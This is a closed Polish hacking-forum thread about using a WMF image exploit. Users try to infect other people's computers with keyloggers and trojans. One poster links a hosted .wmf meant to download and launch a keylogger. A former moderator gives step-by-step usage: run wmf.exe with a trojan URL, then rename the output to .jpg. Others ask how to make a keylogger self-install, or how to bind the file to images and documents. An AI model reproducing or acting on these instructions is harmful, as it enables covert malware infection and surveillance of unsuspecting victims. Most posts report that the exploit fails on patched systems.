wmf exploit [polish version]

Status
Zamknięty.

haX^

Użytkownik
Dołączył
Październik 25, 2004
Posty
60
jesus, lamagi po pierwsze - to bez www tylko adres.com/plik.exe a po drugi ten co ma problem typu "znika mi okienko" niech sie zajmie czym innym, naprzyklad gazete poczyta :$


/click0r
 

wojonowo

Użytkownik
Dołączył
Listopad 20, 2005
Posty
2
u mnie nie dziala :/

podaje adres poprawnie, plik umieszczam w html, odpalam stronke na (IE / sp2) i neidzieje sie nic. odpalam normalnie (przez IE)... tez nic. odpalam jako jpg... dalej nic. rozsylam ludziom... i zgadnijcie co ;P

ktos tu pisal ze dziala... na czym?
 

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
Mam xp z sp 2 i mi nie działa to. Ciekawi mnie czy to by zadziałało u kogoś gdyby wysłać to przez gg ( w wyślij obrazek a nie plik)??
 

tuc666

Użytkownik
Dołączył
Maj 10, 2006
Posty
4
@up
Wystarczy chyba zmienic rozszerzenie pliku
<


A mi to nie dziala >.<
http://www.republika.pl/neo_fan/lol2.wmf
po wejsciu w ten adres powinno sciagnac plik lol2.wmf, ktory stad sciagnie keyloggera i odpali go na komputerze. Dziala to tylko u mnie, ale na innych komputerach nie -.-
 

Racon

Użytkownik
Dołączył
Maj 13, 2006
Posty
3
Zmienilem roszezenie , i nei wiem czy działa.Wstawiłem na stornke i nic , ja mam latke na to wiec neimgoe sprawdzic :<
 

siara2134

Użytkownik
Dołączył
Maj 16, 2004
Posty
115
a HU* ni działa :/ przez ie ff przez 98 i xp z łatami i bez to i tak hujni* :/
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
Taa juz raczej z tym explo nic nie wypali, bo laty sa a i nawet bez laty jak ktos uzywa FFa to pyta sie czy sciagnac. Szkoda, ze o tym exploicie zrobilo sie glosno, moze bez tego pozostalby dluzej "niezalatany"
 

Jezior666

Użytkownik
Dołączył
Kwiecień 17, 2006
Posty
2
afff

Powiedzcie mi czy Perfect Keyloger mozna podczepic pod wmv zeby sie sam zainstalowal jesli nie podajcie jakiegos innego ;] z gory thx :*
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
Re: afff

Originally posted by Jezior666
Powiedzcie mi czy Perfect Keyloger mozna podczepic pod wmv zeby sie sam zainstalowal jesli nie podajcie jakiegos innego ;] z gory thx :*
lol przeciez wmf zassie ci wszystkie rozszerzenia plikow.
 

siara2134

Użytkownik
Dołączył
Maj 16, 2004
Posty
115
Prosze niech ktos porzadnie to zrobi i poda linka , niewiem aby sie jakis obrazek chodzby sciagnol bo chce zobaczyć czy to nie działa czy poprostu ja tego obslugiwac nie umiem.
 

patology

Były Moderator
Dołączył
Październik 30, 2005
Posty
205
Originally posted by siara2134
Prosze niech ktos porzadnie to zrobi i poda linka , niewiem aby sie jakis obrazek chodzby sciagnol bo chce zobaczyć czy to nie działa czy poprostu ja tego obslugiwac nie umiem.
Uff sciagasz ten plik wmf.exe ktory zostal podany na pierwszej stronie, start,uruchom-->cmd, plik wmf.exe kopiujesz np. na dysk d i w wierszu polecen [cmd] wpisujesz: D:wmf.exe http://adres-z-trojanem

utworzy sie plik wmf, ktory mozesz zmienic na koncowke jpg. tyle.
 

adam_a2

Użytkownik
Dołączył
Marzec 27, 2006
Posty
12
Originally posted by siara2134
no tak robie i co ?? jajco

Na moim ie jajo nic a na ff nawet nie pyta sie czy zessac.

Edit :
------------------------------------------------------------------
zrobilem i co nie działa http://www.siara2134.forall.pl/exploit.jpg jak komuś zadziała to pisać
smile.gif

"The image “http://www.siara2134.forall.pl/exploit.jpg” cannot be displayed, because it contains errors."

ten exploit chyba moze pojsc w zapomnienie.. =P
poprostu nie dziala....
nie mam latek... i nie chodziten exp...
.. jak sie umiesci to na stronie jako obrazek... to po wejscu avast krzyczy ze w itemp jest exploit... to wszystko... wiem ze plik jest dobrze skonfigurowany bo na kompie po najechaniu na niego scaiga sie moj plik:p

juz predzej exploit z kursorkiem i media playerem zadziala niz to ;d
 

camber

Użytkownik
Dołączył
Lipiec 6, 2006
Posty
5
u mnie tak to dziala :

+ wszystko dobrze sie pakuje
smile.gif


- plik wmf nie chce sie otwierac w IE tylko od razu chce sie sciagac
<

- plik jpg wogole sie nie otwiera w IE tak jak by go nie bylo wogole
<


Originally posted by miro
a nie możne tego pliku poprostu zbindować z jakimś jpg/doc/bmp?

wlasnie probuje i binder Wojass'a sie zacina
<
<
 
Status
Zamknięty.
Do góry Bottom